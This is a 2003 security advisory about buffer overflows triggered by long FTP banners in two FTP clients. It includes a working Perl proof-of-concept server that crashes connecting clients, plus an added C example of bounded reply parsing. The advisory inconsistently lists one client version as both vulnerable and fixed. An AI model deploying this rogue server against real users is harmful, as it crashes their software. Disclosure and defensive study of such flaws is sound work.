[NT] Banner Buffer Overflows Found in Multiple FTP Clients
From: support@securiteam.com
Date: 02/05/03
From: support@securiteam.com To: list@securiteam.com Date: 5 Feb 2003 20:00:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Banner Buffer Overflows Found in Multiple FTP Clients
------------------------------------------------------------------------
SUMMARY
A client side vulnerability in the 32-bit FTP Client and ByteCatcher FTP
client allows remote servers to cause the client to crash by sending it a
large banner.
DETAILS
Vulnerable systems:
* 32bit FTP Client version p9.49.01
* ByteCatcher FTP Client V1.04b
Immune systems:
* 32bit FTP version p9.50.01
* ByteCatcher FTP Client V1.04b
It is possible to crash the above FTP Clients by sending them a long (4096
bytes) FTP banner.
Exploit:
#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possibly many other clients have this problem too
#
# http://www.infowarfare.dk
#
# Dennis Rand - Matrix@infowarfare.dk
#
# When FTP clients connect to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM,
                                Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
    print "Client connected.\n";
    print "Attacking...";
    print $client "$buf";
    print "OK\n";
    close($client);
}
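The client-side check that bounds this input, as an added example (not code from the advisory, its author, or either vendor): a reply-line reader in C that refuses any line that does not fit its buffer. `REPLY_MAX`, `struct stream` and the function names are assumptions made for the illustration, and the in-memory stream stands in for the socket so the block runs offline.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 512  /* assumed cap for one reply line; not a value from the advisory */
enum { REPLY_OK = 0, REPLY_TOO_LONG = -1, REPLY_TRUNCATED = -2, REPLY_BAD_CODE = -3 };

/* Hypothetical in-memory byte source standing in for recv(). */
struct stream { const char *data; size_t len, pos; };

/* Read one CRLF-terminated reply into out[outsz]; never writes past out. */
int read_reply_line(struct stream *s, char *out, size_t outsz) {
    size_t n = 0;
    if (outsz == 0) return REPLY_TOO_LONG;
    while (s->pos < s->len) {
        char c = s->data[s->pos++];
        if (c == '\n') {
            if (n > 0 && out[n - 1] == '\r') n--;   /* strip the CR of CRLF */
            out[n] = '\0';
            for (size_t i = 0; i < 3; i++)          /* a reply starts with a 3-digit code */
                if (i >= n || !isdigit((unsigned char)out[i])) return REPLY_BAD_CODE;
            return REPLY_OK;
        }
        if (n + 1 >= outsz) {                       /* keep one byte for the terminator */
            out[0] = '\0';
            return REPLY_TOO_LONG;                  /* oversized line: reject, do not copy */
        }
        out[n++] = c;
    }
    out[0] = '\0';
    return REPLY_TRUNCATED;                         /* peer closed before end of line */
}

/* Classify a constructed banner: `fill` bytes of 'a' followed by `tail`. */
int classify_banner(size_t fill, const char *tail) {
    static char wire[8192];
    char line[REPLY_MAX];
    size_t tl = strlen(tail);
    if (fill > sizeof wire || tl > sizeof wire - fill) return REPLY_TOO_LONG;
    memset(wire, 'a', fill);
    memcpy(wire + fill, tail, tl);
    struct stream s = { wire, fill + tl, 0 };
    return read_reply_line(&s, line, sizeof line);
}

int main(void) {
    printf("normal greeting: %d\n", classify_banner(0, "220 Service ready\r\n"));
    printf("4096-byte banner: %d\n", classify_banner(4096, ""));
    return 0;
}
```

On `REPLY_TOO_LONG` the caller closes the connection rather than truncating and continuing, since the rest of the stream can no longer be trusted to parse as replies.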
Disclosure timeline:
04/01/2003 Found the Vulnerability.
04/01/2003 Author notified.
01/02/2003 Responses received
04/02/2003 Public Disclosure.
ADDITIONAL INFORMATION
The information has been provided by Dennis Rand (matrix@infowarfare.dk).